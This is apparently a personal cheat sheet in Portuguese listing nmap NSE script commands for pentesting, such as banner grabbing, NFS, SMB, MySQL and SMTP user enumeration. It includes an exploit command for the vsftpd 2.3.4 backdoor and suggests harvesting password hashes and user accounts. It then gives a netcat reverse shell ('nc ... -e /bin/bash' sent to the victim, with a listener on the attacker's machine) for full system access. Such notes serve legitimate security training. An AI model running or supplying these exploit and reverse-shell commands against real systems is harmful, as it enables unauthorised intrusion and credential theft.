Os scripts nmap estão localizados em:
/usr/share/nmap/script


namp --script-help script.nse

Script captura de banner:

nmap 192.168.1.1 -p 25 --script banner.nse         (pode especificar a porta ou não)
-------------------------------

Script para listagem de compartilhamento NFS (Podendo aproveitar a falha para montar as unidades)

nmap --script=nfs-ls 192.168.1.17
-------------------------------

Script para exploração de falha do vsftpd 2.3.4 (backdoor)

nmap --script ftp-vsftp-backdoor.nse --script-args ftp-vsftpd-backdoor.cmd="ls" 192.168.1.17
    OBS: Esse script exige o argumento para rodar o comando no backdoor, no exemplo usamos o "ls"
        OBS: Usar criatividade, pois pode se capturar hashs de senhas, usuarios de sistemas e etc no sistema alvo

Exemplo de uso: Executar backdoor para ter acesso ao bash da vitima, enviando o comando "nc 192.168.1.11 4000 -e /bin/bash" e mandando nosso servidor executar o comando "nc -lnp 4000", onde ao fechar a conexao, nosso server tera acesso completo ao sistema da vitima.

Servidor: nc -nvlp 4000
Vitima: nc 192.168.1.11 4000 -e /bin/bash

---------------------------------
Script para exibir apenas informação de unidades nfs compartilhadas:

nmap --script nfs-showmount.nse 192.168.1.17
-----------------------------------

Script verificar compartilhamento SMB (Usado comumente em Windows - Util para verificar numa rede as maquinas com compartihamento ativo)

nmap --script=smb-enum-share.nse 192.168.1.17
--------------------------------------

Verifica informações de Mysql

nmap --script=mysql-info.nse 192.168.1.17
-------------------------------------

Verificar usuarios SMTP

nmap 192.168.1.17 --script smtp-enum-users.nse









